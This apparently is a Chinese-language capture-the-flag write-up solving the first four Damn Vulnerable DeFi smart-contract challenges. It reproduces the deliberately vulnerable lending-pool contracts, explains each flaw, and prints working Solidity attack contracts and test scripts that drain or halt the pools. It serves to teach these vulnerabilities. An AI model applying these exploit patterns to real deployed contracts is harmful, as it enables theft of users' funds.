<!DOCTYPE html><html><head>
      <title>Damn1-4</title>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      
      <link rel="stylesheet" href="file:///c:\Users\&#x5C0F;&#x6829;\.vscode\extensions\shd101wyy.markdown-preview-enhanced-0.6.3\node_modules\@shd101wyy\mume\dependencies\katex\katex.min.css">
      
      
      
      
      
      
      
      
      
      <style>
      /**
 * prism.js Github theme based on GitHub's theme.
 * @author Sam Clarke
 */
code[class*="language-"],
pre[class*="language-"] {
  color: #333;
  background: none;
  font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace;
  text-align: left;
  white-space: pre;
  word-spacing: normal;
  word-break: normal;
  word-wrap: normal;
  line-height: 1.4;

  -moz-tab-size: 8;
  -o-tab-size: 8;
  tab-size: 8;

  -webkit-hyphens: none;
  -moz-hyphens: none;
  -ms-hyphens: none;
  hyphens: none;
}

/* Code blocks */
pre[class*="language-"] {
  padding: .8em;
  overflow: auto;
  /* border: 1px solid #ddd; */
  border-radius: 3px;
  /* background: #fff; */
  background: #f5f5f5;
}

/* Inline code */
:not(pre) > code[class*="language-"] {
  padding: .1em;
  border-radius: .3em;
  white-space: normal;
  background: #f5f5f5;
}

.token.comment,
.token.blockquote {
  color: #969896;
}

.token.cdata {
  color: #183691;
}

.token.doctype,
.token.punctuation,
.token.variable,
.token.macro.property {
  color: #333;
}

.token.operator,
.token.important,
.token.keyword,
.token.rule,
.token.builtin {
  color: #a71d5d;
}

.token.string,
.token.url,
.token.regex,
.token.attr-value {
  color: #183691;
}

.token.property,
.token.number,
.token.boolean,
.token.entity,
.token.atrule,
.token.constant,
.token.symbol,
.token.command,
.token.code {
  color: #0086b3;
}

.token.tag,
.token.selector,
.token.prolog {
  color: #63a35c;
}

.token.function,
.token.namespace,
.token.pseudo-element,
.token.class,
.token.class-name,
.token.pseudo-class,
.token.id,
.token.url-reference .token.variable,
.token.attr-name {
  color: #795da3;
}

.token.entity {
  cursor: help;
}

.token.title,
.token.title .token.punctuation {
  font-weight: bold;
  color: #1d3e81;
}

.token.list {
  color: #ed6a43;
}

.token.inserted {
  background-color: #eaffea;
  color: #55a532;
}

.token.deleted {
  background-color: #ffecec;
  color: #bd2c00;
}

.token.bold {
  font-weight: bold;
}

.token.italic {
  font-style: italic;
}


/* JSON */
.language-json .token.property {
  color: #183691;
}

.language-markup .token.tag .token.punctuation {
  color: #333;
}

/* CSS */
code.language-css,
.language-css .token.function {
  color: #0086b3;
}

/* YAML */
.language-yaml .token.atrule {
  color: #63a35c;
}

code.language-yaml {
  color: #183691;
}

/* Ruby */
.language-ruby .token.function {
  color: #333;
}

/* Markdown */
.language-markdown .token.url {
  color: #795da3;
}

/* Makefile */
.language-makefile .token.symbol {
  color: #795da3;
}

.language-makefile .token.variable {
  color: #183691;
}

.language-makefile .token.builtin {
  color: #0086b3;
}

/* Bash */
.language-bash .token.keyword {
  color: #0086b3;
}

/* highlight */
pre[data-line] {
  position: relative;
  padding: 1em 0 1em 3em;
}
pre[data-line] .line-highlight-wrapper {
  position: absolute;
  top: 0;
  left: 0;
  background-color: transparent;
  display: block;
  width: 100%;
}

pre[data-line] .line-highlight {
  position: absolute;
  left: 0;
  right: 0;
  padding: inherit 0;
  margin-top: 1em;
  background: hsla(24, 20%, 50%,.08);
  background: linear-gradient(to right, hsla(24, 20%, 50%,.1) 70%, hsla(24, 20%, 50%,0));
  pointer-events: none;
  line-height: inherit;
  white-space: pre;
}

pre[data-line] .line-highlight:before, 
pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-start);
  position: absolute;
  top: .4em;
  left: .6em;
  min-width: 1em;
  padding: 0 .5em;
  background-color: hsla(24, 20%, 50%,.4);
  color: hsl(24, 20%, 95%);
  font: bold 65%/1.5 sans-serif;
  text-align: center;
  vertical-align: .3em;
  border-radius: 999px;
  text-shadow: none;
  box-shadow: 0 1px white;
}

pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-end);
  top: auto;
  bottom: .4em;
}html body{font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,freesans,sans-serif;font-size:16px;line-height:1.6;color:#333;background-color:#fff;overflow:initial;box-sizing:border-box;word-wrap:break-word}html body>:first-child{margin-top:0}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{line-height:1.2;margin-top:1em;margin-bottom:16px;color:#000}html body h1{font-size:2.25em;font-weight:300;padding-bottom:.3em}html body h2{font-size:1.75em;font-weight:400;padding-bottom:.3em}html body h3{font-size:1.5em;font-weight:500}html body h4{font-size:1.25em;font-weight:600}html body h5{font-size:1.1em;font-weight:600}html body h6{font-size:1em;font-weight:600}html body h1,html body h2,html body h3,html body h4,html body h5{font-weight:600}html body h5{font-size:1em}html body h6{color:#5c5c5c}html body strong{color:#000}html body del{color:#5c5c5c}html body a:not([href]){color:inherit;text-decoration:none}html body a{color:#08c;text-decoration:none}html body a:hover{color:#00a3f5;text-decoration:none}html body img{max-width:100%}html body>p{margin-top:0;margin-bottom:16px;word-wrap:break-word}html body>ul,html body>ol{margin-bottom:16px}html body ul,html body ol{padding-left:2em}html body ul.no-list,html body ol.no-list{padding:0;list-style-type:none}html body ul ul,html body ul ol,html body ol ol,html body ol ul{margin-top:0;margin-bottom:0}html body li{margin-bottom:0}html body li.task-list-item{list-style:none}html body li>p{margin-top:0;margin-bottom:0}html body .task-list-item-checkbox{margin:0 .2em .25em -1.8em;vertical-align:middle}html body .task-list-item-checkbox:hover{cursor:pointer}html body blockquote{margin:16px 0;font-size:inherit;padding:0 15px;color:#5c5c5c;background-color:#f0f0f0;border-left:4px solid #d6d6d6}html body blockquote>:first-child{margin-top:0}html body blockquote>:last-child{margin-bottom:0}html body hr{height:4px;margin:32px 0;background-color:#d6d6d6;border:0 none}html body table{margin:10px 0 15px 0;border-collapse:collapse;border-spacing:0;display:block;width:100%;overflow:auto;word-break:normal;word-break:keep-all}html body table th{font-weight:bold;color:#000}html body table td,html body table th{border:1px solid #d6d6d6;padding:6px 13px}html body dl{padding:0}html body dl dt{padding:0;margin-top:16px;font-size:1em;font-style:italic;font-weight:bold}html body dl dd{padding:0 16px;margin-bottom:16px}html body code{font-family:Menlo,Monaco,Consolas,'Courier New',monospace;font-size:.85em !important;color:#000;background-color:#f0f0f0;border-radius:3px;padding:.2em 0}html body code::before,html body code::after{letter-spacing:-0.2em;content:"\00a0"}html body pre>code{padding:0;margin:0;font-size:.85em !important;word-break:normal;white-space:pre;background:transparent;border:0}html body .highlight{margin-bottom:16px}html body .highlight pre,html body pre{padding:1em;overflow:auto;font-size:.85em !important;line-height:1.45;border:#d6d6d6;border-radius:3px}html body .highlight pre{margin-bottom:0;word-break:normal}html body pre code,html body pre tt{display:inline;max-width:initial;padding:0;margin:0;overflow:initial;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}html body pre code:before,html body pre tt:before,html body pre code:after,html body pre tt:after{content:normal}html body p,html body blockquote,html body ul,html body ol,html body dl,html body pre{margin-top:0;margin-bottom:16px}html body kbd{color:#000;border:1px solid #d6d6d6;border-bottom:2px solid #c7c7c7;padding:2px 4px;background-color:#f0f0f0;border-radius:3px}@media print{html body{background-color:#fff}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{color:#000;page-break-after:avoid}html body blockquote{color:#5c5c5c}html body pre{page-break-inside:avoid}html body table{display:table}html body img{display:block;max-width:100%;max-height:100%}html body pre,html body code{word-wrap:break-word;white-space:pre}}.markdown-preview{width:100%;height:100%;box-sizing:border-box}.markdown-preview .pagebreak,.markdown-preview .newpage{page-break-before:always}.markdown-preview pre.line-numbers{position:relative;padding-left:3.8em;counter-reset:linenumber}.markdown-preview pre.line-numbers>code{position:relative}.markdown-preview pre.line-numbers .line-numbers-rows{position:absolute;pointer-events:none;top:1em;font-size:100%;left:0;width:3em;letter-spacing:-1px;border-right:1px solid #999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.markdown-preview pre.line-numbers .line-numbers-rows>span{pointer-events:none;display:block;counter-increment:linenumber}.markdown-preview pre.line-numbers .line-numbers-rows>span:before{content:counter(linenumber);color:#999;display:block;padding-right:.8em;text-align:right}.markdown-preview .mathjax-exps .MathJax_Display{text-align:center !important}.markdown-preview:not([for="preview"]) .code-chunk .btn-group{display:none}.markdown-preview:not([for="preview"]) .code-chunk .status{display:none}.markdown-preview:not([for="preview"]) .code-chunk .output-div{margin-bottom:16px}.scrollbar-style::-webkit-scrollbar{width:8px}.scrollbar-style::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}.scrollbar-style::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode]){position:relative;width:100%;height:100%;top:0;left:0;margin:0;padding:0;overflow:auto}html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{position:relative;top:0}@media screen and (min-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em calc(50% - 457px + 2em)}}@media screen and (max-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{font-size:14px !important;padding:1em}}@media print{html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{display:none}}html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{position:fixed;bottom:8px;left:8px;font-size:28px;cursor:pointer;color:inherit;z-index:99;width:32px;text-align:center;opacity:.4}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] #sidebar-toc-btn{opacity:1}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc{position:fixed;top:0;left:0;width:300px;height:100%;padding:32px 0 48px 0;font-size:14px;box-shadow:0 0 4px rgba(150,150,150,0.33);box-sizing:border-box;overflow:auto;background-color:inherit}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar{width:8px}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc a{text-decoration:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{padding:0 1.6em;margin-top:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc li{margin-bottom:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{list-style-type:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{left:300px;width:calc(100% -  300px);padding:2em calc(50% - 457px -  150px);margin:0;box-sizing:border-box}@media screen and (max-width:1274px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{width:100%}}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .markdown-preview{left:50%;transform:translateX(-50%)}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .md-sidebar-toc{display:none}
/* Please visit the URL below for more information: */
/*   https://shd101wyy.github.io/markdown-preview-enhanced/#/customize-css */

      </style>
    </head>
    <body for="html-export">
      <div class="mume markdown-preview  ">
      <h1 class="mume-header" id="damn-defi%E9%9D%B6%E5%9C%BA%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%951-4">Damn Defi&#x9776;&#x573A;&#x5237;&#x9898;&#x8BB0;&#x5F55;(1-4)</h1>

<pre class="language-text">author: Thomas_Xu
</pre>
<h2 class="mume-header" id="1-unstoppable">1 Unstoppable</h2>

<p>&#x8FD9;&#x4E00;&#x5173;&#x6CA1;&#x6709;&#x4EC0;&#x4E48;&#x592A;&#x5927;&#x7684;&#x96BE;&#x5EA6;&#xFF0C;&#x4E3B;&#x8981;&#x662F;&#x5E26;&#x9886;&#x8FDB;&#x5165;Damn&#x7684;&#x9898;&#x76EE;</p>
<p>&#x8FD9;&#x9053;&#x9898;&#x662F;&#x60F3;&#x8BA9;&#x6211;&#x4EEC;&#x8BA9;&#x8FD9;&#x4E2A;&#x95EA;&#x7535;&#x8D37;&#x6C60;&#x505C;&#x6B62;&#x5DE5;&#x4F5C;</p>
<p>&#x6211;&#x4EEC;&#x9996;&#x5148;&#x770B;&#x4E00;&#x4E0B;&#x5408;&#x7EA6;</p>
<pre data-role="codeBlock" data-info class="language-"><code> // SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import &quot;@openzeppelin/contracts/token/ERC20/IERC20.sol&quot;;
import &quot;@openzeppelin/contracts/security/ReentrancyGuard.sol&quot;;

interface IReceiver {
    function receiveTokens(address tokenAddress, uint256 amount) external;
}

/**
 * @title UnstoppableLender
 * @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz)
 */
contract UnstoppableLender is ReentrancyGuard {

    IERC20 public immutable damnValuableToken;
    uint256 public poolBalance;

    constructor(address tokenAddress) {
        require(tokenAddress != address(0), &quot;Token address cannot be zero&quot;);
        damnValuableToken = IERC20(tokenAddress);
    }

    function depositTokens(uint256 amount) external nonReentrant {
        require(amount &gt; 0, &quot;Must deposit at least one token&quot;);
        // Transfer token from sender. Sender must have first approved them.
        damnValuableToken.transferFrom(msg.sender, address(this), amount);
        poolBalance = poolBalance + amount;
    }

    function flashLoan(uint256 borrowAmount) external nonReentrant {
        require(borrowAmount &gt; 0, &quot;Must borrow at least one token&quot;);

        uint256 balanceBefore = damnValuableToken.balanceOf(address(this));
        require(balanceBefore &gt;= borrowAmount, &quot;Not enough tokens in pool&quot;);

        // Ensured by the protocol via the `depositTokens` function
        assert(poolBalance == balanceBefore);
        
        damnValuableToken.transfer(msg.sender, borrowAmount);
        
        IReceiver(msg.sender).receiveTokens(address(damnValuableToken), borrowAmount);
        
        uint256 balanceAfter = damnValuableToken.balanceOf(address(this));
        require(balanceAfter &gt;= balanceBefore, &quot;Flash loan hasn&apos;t been paid back&quot;);
    }
}
</code></pre><p>&#x53EF;&#x4EE5;&#x6CE8;&#x610F;&#x5230;&#x8FD9;&#x4E2A;&#x95EA;&#x7535;&#x8D37;&#x51FD;&#x6570;&#x662F;&#x6709;&#x660E;&#x663E;&#x95EE;&#x9898;&#x7684;<br>
<code>assert(poolBalance == balanceBefore);</code>&#x8FD9;&#x4E2A;&#x5224;&#x65AD;&#x4E0D;&#x4E25;&#x8C28;&#xFF0C;poolBalance&#x53EA;&#x6709;&#x5728;&#x8C03;&#x7528;depositTokens()&#x51FD;&#x6570;&#x5B58;&#x6B3E;&#x65F6;&#xFF0C;&#x624D;&#x4F1A;&#x589E;&#x52A0;&#xFF0C;&#x800C;&#x5982;&#x679C;&#x6211;&#x4EEC;&#x901A;&#x8FC7;ERC20&#x7684;transfer&#x6765;&#x8F6C;&#x8D26;&#xFF0C;balanceBefore&#x4F59;&#x989D;&#x4F1A;&#x589E;&#x52A0;&#xFF0C;&#x4F46;poolBalance&#x5E76;&#x6CA1;&#x6709;&#x6539;&#x53D8;&#xFF0C;&#x8FD9;&#x5C31;&#x4F1A;&#x9020;&#x6210;&#x6B64;&#x95EA;&#x7535;&#x8D37;&#x6C60;&#x5B95;&#x673A;&#x3002;</p>
<ul>
<li>&#x89E3;&#x9898;&#x6B65;&#x9AA4;&#xFF1A;<br>
&#x6211;&#x4EEC;&#x53EA;&#x9700;&#x8981;&#x5411;&#x8BE5;&#x5408;&#x7EA6;&#x63D0;&#x4EA4;&#x4E00;&#x7B14;&#x8F6C;&#x8D26;&#x5373;&#x53EF;<br>
<code>await this.token.transfer(this.pool.address, INITIAL_ATTACKER_BALANCE, { from: attacker} );</code></li>
</ul>
<h2>2 naive-reciever</h2>
<p>&#x5148;&#x770B;&#x5408;&#x7EA6;</p>
<pre data-role="codeBlock" data-info class="language-"><code>contract NaiveReceiverLenderPool is ReentrancyGuard {
   using SafeMath for uint256;
   using Address for address;

   uint256 private constant FIXED_FEE = 1 ether; // not the cheapest flash loan

   function fixedFee() external pure returns (uint256) {
       return FIXED_FEE;
   }

   function flashLoan(address payable borrower, uint256 borrowAmount) external nonReentrant {

       uint256 balanceBefore = address(this).balance;
       require(balanceBefore &gt;= borrowAmount, &quot;Not enough ETH in pool&quot;);


       require(address(borrower).isContract(), &quot;Borrower must be a deployed contract&quot;);
       // Transfer ETH and handle control to receiver
       (bool success, ) = borrower.call{value: borrowAmount}(
           abi.encodeWithSignature(
               &quot;receiveEther(uint256)&quot;,
               FIXED_FEE
           )
       );
       require(success, &quot;External call failed&quot;);

       require(
           address(this).balance &gt;= balanceBefore.add(FIXED_FEE),
           &quot;Flash loan hasn&apos;t been paid back&quot;
       );
   }

   // Allow deposits of ETH
   receive () external payable {}
}
</code></pre><ul>
<li>
<p><strong>&#x5206;&#x6790;</strong><br>
&#x8FD9;&#x4E2A;flashloan&#x51FD;&#x6570;&#x53EA;&#x8981;&#x88AB;&#x8C03;&#x7528;&#x4E00;&#x6B21;&#x5C31;&#x4F1A;&#x62BD;&#x53D6;1ETH&#x7684;&#x5C0F;&#x8D39;&#xFF0C;&#x5728;&#x8FD9;&#x79CD;&#x65F6;&#x5019;&#xFF0C;&#x63A5;&#x6536;&#x5668;&#x5FC5;&#x987B;&#x8981;&#x5224;&#x65AD;&#x6D88;&#x606F;&#x7684;&#x53D1;&#x9001;&#x8005;&#x662F;&#x5426;&#x4E3A;&#x81EA;&#x5DF1;&#xFF0C;&#x5426;&#x5219;&#x4EFB;&#x4F55;&#x4EBA;&#x90FD;&#x53EF;&#x4EE5;&#x5192;&#x5145;&#x63A5;&#x6536;&#x5668;&#x53D1;&#x9001;&#x95EA;&#x7535;&#x8D37;&#x8BF7;&#x6C42;&#x3002;&#x5BFC;&#x81F4;&#x81EA;&#x5DF1;token&#x7684;&#x6D41;&#x5931;&#x3002;</p>
</li>
<li>
<p><strong>Exploit</strong><br>
&#x53EA;&#x9700;&#x8981;&#x5FAA;&#x73AF;&#x8C03;&#x7528;flashloan&#x51FD;&#x6570;&#x5373;&#x53EF;</p>
</li>
</ul>
<pre data-role="codeBlock" data-info class="language-"><code>for(let i = 0; i &lt; 10; i++){
            await this.pool.connect(attacker).flashLoan(this.receiver.address, &quot;0&quot;);
        }
</code></pre><h2 class="mume-header" id="3-truster">3 Truster</h2>

<p>&#x8FD9;&#x53C8;&#x662F;&#x4E00;&#x4E2A;&#x5173;&#x4E8E;&#x5916;&#x90E8;&#x8C03;&#x7528;&#x7684;&#x4E00;&#x4E2A;&#x6F0F;&#x6D1E;<br>
&#x5148;&#x770B;&#x4EE3;&#x7801;</p>
<pre data-role="codeBlock" data-info class="language-"><code>// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import &quot;@openzeppelin/contracts/token/ERC20/IERC20.sol&quot;;
import &quot;@openzeppelin/contracts/utils/Address.sol&quot;;
import &quot;@openzeppelin/contracts/security/ReentrancyGuard.sol&quot;;

/**
 * @title TrusterLenderPool
 * @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz)
 */
contract TrusterLenderPool is ReentrancyGuard {

    using Address for address;

    IERC20 public immutable damnValuableToken;

    constructor (address tokenAddress) {
        damnValuableToken = IERC20(tokenAddress);
    }

    function flashLoan(
        uint256 borrowAmount,
        address borrower,
        address target,
        bytes calldata data
    )
        external
        nonReentrant
    {
        uint256 balanceBefore = damnValuableToken.balanceOf(address(this));
        require(balanceBefore &gt;= borrowAmount, &quot;Not enough tokens in pool&quot;);
        
        damnValuableToken.transfer(borrower, borrowAmount);
        target.functionCall(data);

        uint256 balanceAfter = damnValuableToken.balanceOf(address(this));
        require(balanceAfter &gt;= balanceBefore, &quot;Flash loan hasn&apos;t been paid back&quot;);
    }

}

</code></pre><ul>
<li><strong>&#x5206;&#x6790;</strong><br>
<code>ReentrancyGuard</code>&#x5E76;&#x4E0D;&#x662F;&#x80FD;&#x8BA9;&#x4F60;&#x5B89;&#x6795;&#x65E0;&#x5FE7;&#x7684;&#x9632;&#x6B62;&#x5916;&#x90E8;&#x8C03;&#x7528;&#x7684;&#x65B9;&#x6CD5;&#xFF0C;&#x5728;&#x8FD9;&#x79CD;&#x7279;&#x5B9A;&#x60C5;&#x51B5;&#x4E0B;&#xFF0C;&#x6700;&#x5927;&#x7684;&#x95EE;&#x9898;&#x662F;&#x5141;&#x8BB8;&#x6307;&#x5B9A;&#x4E0E;&#x501F;&#x6B3E;&#x4EBA;&#x5408;&#x540C;&#x4E0D;&#x540C;&#x7684;&#x547C;&#x53EB;&#x76EE;&#x6807;&#x3002;</li>
<li><strong>Exploit</strong><br>
&#x6211;&#x4EEC;&#x6CE8;&#x610F;&#x5230;&#x5728;&#x6B64;&#x5408;&#x7EA6;&#x4E2D;&#x6307;&#x5B9A;&#x4E86;token&#x5730;&#x5740;&#xFF0C;&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x83B7;&#x53D6;&#x5230;&#x6B64;token&#x5730;&#x5740;&#xFF0C;&#x901A;&#x8FC7;&#x501F;&#x5165;&#x7684;&#x6F0F;&#x6D1E;&#x5192;&#x5145;pool&#x6C60;<code>approve</code>&#x7ED9;&#x6211;&#x4EEC;&#x4E00;&#x7B14;&#x5DE8;&#x6B3E;&#xFF0C;&#x968F;&#x540E;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x628A;approve&#x7684;&#x8FD9;&#x90E8;&#x5206;token&#x62FF;&#x5230;&#x624B;&#x3002;<br>
&#x653B;&#x51FB;&#x5408;&#x7EA6;&#x5982;&#x4E0B;</li>
</ul>
<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.8.0;
import &quot;./TrusterLenderPool.sol&quot;;
import &quot;@openzeppelin/contracts/token/ERC20/IERC20.sol&quot;;

interface ITrusterLenderPool{
    function flashLoan(uint256 borrowAmount, address borrower, address target, bytes calldata data) external;
}

contract TrusterExploit{
    ITrusterLenderPool cons;
    uint256 balanceOfPool;
    address tokenAdr;
    address poolAdr;
    constructor(address _pool, uint256 BalanceOfPool, address _token){
        cons = ITrusterLenderPool(_pool);
        poolAdr = _pool;
        balanceOfPool = BalanceOfPool;
        tokenAdr = _token;
    }
    function attack() public {
        cons.flashLoan(0, msg.sender, tokenAdr, abi.encodeWithSignature(&quot;approve(address,uint256)&quot;, address(this), balanceOfPool));
        IERC20 token = IERC20(tokenAdr);
        token.transferFrom(poolAdr, msg.sender,balanceOfPool);
    }
}
</code></pre><pre data-role="codeBlock" data-info class="language-"><code>  it(&apos;Exploit&apos;, async function () {
        /** CODE YOUR EXPLOIT HERE  */
        const attackconst = await ethers.getContractFactory(&apos;TrusterExploit&apos;, attacker);
        this.exploit = await attackconst.deploy(this.pool.address, TOKENS_IN_POOL, this.token.address);
        await this.exploit.connect(attacker).attack();
        
    });
</code></pre><h2 class="mume-header" id="4-side-entrance">4 side-entrance</h2>

<p>&#x5148;&#x770B;&#x4EE3;&#x7801;</p>
<pre data-role="codeBlock" data-info class="language-"><code>// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;
import &quot;@openzeppelin/contracts/utils/Address.sol&quot;;

interface IFlashLoanEtherReceiver {
    function execute() external payable;
}

/**
 * @title SideEntranceLenderPool
 * @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz)
 */

contract SideEntranceLenderPool {
    using Address for address payable;

    mapping (address =&gt; uint256) private balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amountToWithdraw = balances[msg.sender];
        balances[msg.sender] = 0;
        payable(msg.sender).sendValue(amountToWithdraw);
    }

    function flashLoan(uint256 amount) external {
        uint256 balanceBefore = address(this).balance;
        require(balanceBefore &gt;= amount, &quot;Not enough ETH in balance&quot;);
        
        IFlashLoanEtherReceiver(msg.sender).execute{value: amount}();

        require(address(this).balance &gt;= balanceBefore, &quot;Flash loan hasn&apos;t been paid back&quot;);    
    }
}
</code></pre><ul>
<li>
<p><strong>&#x5206;&#x6790;</strong><br>
&#x901A;&#x8FC7;&#x9605;&#x8BFB;&#x4EE3;&#x7801;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x660E;&#x663E;&#x7684;&#x53D1;&#x73B0;&#x6B64;&#x9898;&#x7684;flashloan&#x7684;&#x5224;&#x65AD;&#x540E;&#x7F00;&#x6761;&#x4EF6;&#x6709;&#x673A;&#x53EF;&#x4E58;<code>require(address(this).balance &gt;= balanceBefore</code>&#x8FD9;&#x91CC;&#x68C0;&#x67E5;&#x7684;&#x662F;&#x5F53;&#x524D;&#x5408;&#x7EA6;&#x7684;&#x4F59;&#x989D;&#xFF0C;&#x800C;&#x4E0D;&#x662F;&#x68C0;&#x67E5;&#x7684;&#x501F;&#x8D37;&#x6C60;&#x91CC;&#x7684;&#x4F59;&#x989D;&#xFF0C;&#x8FD9;&#x5BFC;&#x81F4;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;&#x5B58;&#x6B3E;<code>deposit</code>&#x6765;&#x4F2A;&#x9020;&#x6211;&#x4EEC;&#x5DF2;&#x7ECF;&#x8FD8;&#x6B3E;&#x7684;&#x4E8B;&#x4EF6;&#x3002;&#x6211;&#x4EEC;&#x53EA;&#x9700;&#x8981;&#x5728;<code>receiver</code>&#x91CC;&#x9762;&#x5B58;&#x6B3E;&#xFF0C;&#x5C31;&#x53EF;&#x4EE5;&#x4F7F;&#x6211;&#x4EEC;&#x7684;balance&#x4E0D;&#x65AD;&#x589E;&#x52A0;&#x3002;&#x6700;&#x540E;&#x63D0;&#x6B3E;&#x5373;&#x53EF;</p>
</li>
<li>
<p><strong>Expolit</strong><br>
&#x6839;&#x636E;&#x5206;&#x6790;&#x5199;&#x51FA;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#xFF1A;</p>
</li>
</ul>
<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.8.0;

import &quot;./SideEntranceLenderPool.sol&quot;;

// interface IFlashLoanEtherReceiver {
//     function execute() external payable;
// }

contract SideEntranceExploit is IFlashLoanEtherReceiver{
    SideEntranceLenderPool pool;
    address payable attacker;
    constructor(address _pool){
        pool = SideEntranceLenderPool(_pool);
        attacker = payable(msg.sender);
    }

    function attack(uint256 _amount) public{
        pool.flashLoan(_amount);
        pool.withdraw();
    }

    function execute() external payable override {
        pool.deposit{value:address(this).balance}();
    }
    
    receive() external payable{
        attacker.transfer(address(this).balance);
    }
}
</code></pre><pre data-role="codeBlock" data-info class="language-"><code>it(&apos;Exploit&apos;, async function () {
        /** CODE YOUR EXPLOIT HERE */
        const sideEnranceExploit = await ethers.getContractFactory(&apos;SideEntranceExploit&apos;, attacker);
        this.exploit = await sideEnranceExploit.deploy(this.pool.address);
        await this.exploit.connect(attacker).attack(ETHER_IN_POOL);
    });
</code></pre>
      </div>
      
      
    
    
    
    
    
    
    
    
  
    </body></html>